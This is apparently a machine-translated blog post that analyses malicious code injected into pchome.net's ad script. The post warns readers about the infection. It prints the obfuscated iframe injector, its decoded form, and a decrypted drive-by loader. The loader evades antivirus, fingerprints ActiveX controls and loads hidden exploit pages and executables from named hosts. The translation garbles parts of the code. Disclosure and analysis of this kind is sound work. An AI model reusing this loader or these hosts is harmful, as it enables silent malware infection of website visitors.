Last week, the virus was infected with ad.pchome.net.

Relatively concealed. The middle of http://btn.pchome.net/flash.js is added as follows: Code :

Window ["\ x64 \ x6f \ x63 \ x75 \ x6d \ X65 \ x6e \ x74"] ["\ x77 \ x72 \ x69 \ x74 \ X65 \ x6c \ x6e"] ('\ x3c \ x69 \ x66 \ x72 \ x61 \ x6d \ X65 \ x68 \ X65 \ x69 \ x67 \ x68 \ x74 \ X3D \ x30 \ x77 \ x69 \ x64 \ x74 \ x68 \ X3D \ x30 \ x73 \ x72 \ x63 \ X3D \ x22 \ x68 \ x74 \ x74 \ cross 7 \ x3a \ x2f \ x2f \ x77 \ x77 \ x77 \ x2e \ x35 \ x39 \ x2e \ x76 \ x63 \ x2f \ x61 \ x67 \ X65 \ x2f \ x61 \ x64 \ x64 \ x5f \ x36 \ x34 \ x34 \ x34 \ x35 \ x35 \ x35 \ x2e \ x68 \ x74 \ x6d \ x22 \ x3e \ x3c \ x2f \ x69 \ x66 \ x72 \ x61 \ x6d \ X65 \ x3e ');

That's it:

Window ["document"] ["writeln"] ('<IFRAME Height = 0 width = 0 src = "http://www.59.vc/page/add_644455.htm"> </iframe> ');

However, only this JS will not make the IFRAME take effect. What makes it take effect is to call this js to display the flash code:

<Script language = "JavaScript" type = "text/JavaScript">
Writeflashhtml ("_ SWF = http://btn.pchome.net/pchome/20071217/300_250.swf", "_ width = 300", "_ Height = 250", "_ wmode = opaque ");
</SCRIPT>

With this, IFRAME takes effect. After some calls and decryption, you will get:

Function biskis () {for (I = 2; I <26; I ++) {var kis6 = new image (); var kis7 = new image (); vaR root = string. fromcharcode (65 + I); kis6.src = "MK: @ msitstore:" + root + ": \ Program Files \ Kaspersky Lab \ Kaspersky Internet Security 6.0 \ doc \ context. CHM:/images/help.gif "; kis7.src =" MK: @ msitstore: "+ root + ": \ Program Files \ Kaspersky Lab \ Kaspersky Internet Security 7.0 \ doc \ context. CHM:/images/help.gif "; if (kis6.height = 41 | Kis7.height = 41) return true} return false} var then = new date (); aaxxx = "xxxyyfassssfsadfasdf"; then. settime (then. gettime () + 24x60x60*1000); var aaffdasfascookie = new string (document. cookie); var cookieheader = "cookie1 ="; aaxxx = "xxxyyfassssfsadfasdf"; if (! Biskis () & aaffdasfascookie. indexof (cookieheader) =-1) {aaxxx = "xxxyyyyfassssfsadfasdf"; document. cookie = "cookie1 = popw.s; expires =" + then. togmtstring (); aaxxx = "xxxyyfassssfsadfasdf"; try {If (New activexobject ("ierpctl. ierpctl.1 ") document. write ('<IFRAME Style = display: None src = "http://w18.vg/real.gif" ></ IFRAME>')} catch (e) {}try {If (navigator. useragent. tolowercase (). indexof ("MSIE 7") =-1) document. write ('<IFRAME Style = display: None src = "http://w18.vg/ms.gif"> </iframe>')} catch (e) {}try {If (New activexobject ("dpclient. VOD ") document. write ('<IFRAME Style = display: None src = "http://w18.vg/xl.gif"> </iframe>')} catch (e) {}try {If (New activexobject ("glchat. glchatctrl.1 ") document. write ('<IFRAME Style = display: None src = "http://w18.vg/lz.gif"> </iframe>')} catch (e) {}try {If (New activexobject ("MPs. stormplayer.1 ") document. write ('<IFRAME Style = display: None src = "http://w18.vg/bf.gif"> </iframe>')} catch (e) {}try {If (New activexobject ("baidubar. tool.1 ") document. write ('<IFRAME Style = display: None src = "http://w18.vg/baidu.gif"> </iframe>')} catch (e ){}}

K # E + XD ++ ik + EX = # d $ ikexd + $ I # kexdi + k $ ex $ di $ ke # X # di = K + e $ X = $ di # K + # EX = Dik = e $ = xdik = $ EX = Dik $ e $ # x = d = I # Ke # = x + $ D +

Pick a few decryption: http://w18.vg/s.exe

Get another link from this file: http://w18.vg/ss.exe

Something familiar ......

# K = e # x + D = Ike $ XD $ = I = K + # EXD = # I = Ke $ + xdi # K $ = EX = d = # ik + E = x $ d = I = # K = e # x $ d $ + ik = # EXD + ik $ ex $ = d + I + k # e $ XD + ikex # d

We can see from the above that the flash. JS is faulty, so all pages that use this js to put flash are poisonous! I randomly searched several pages and found that they were all toxic. This time, they were suspended in a large area. comrades were careful.

K $ EX = + DI # $ ke + X # Dik $ EXD $ I = Ke $ XD + # I + kexd = I + KE = x $ d = I = kexd # = ik = e $ x = d = I # + kexd = ik # ex # di = k = E = x = # dikexdi # Ke

Reprinted please keep the statement! Http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html)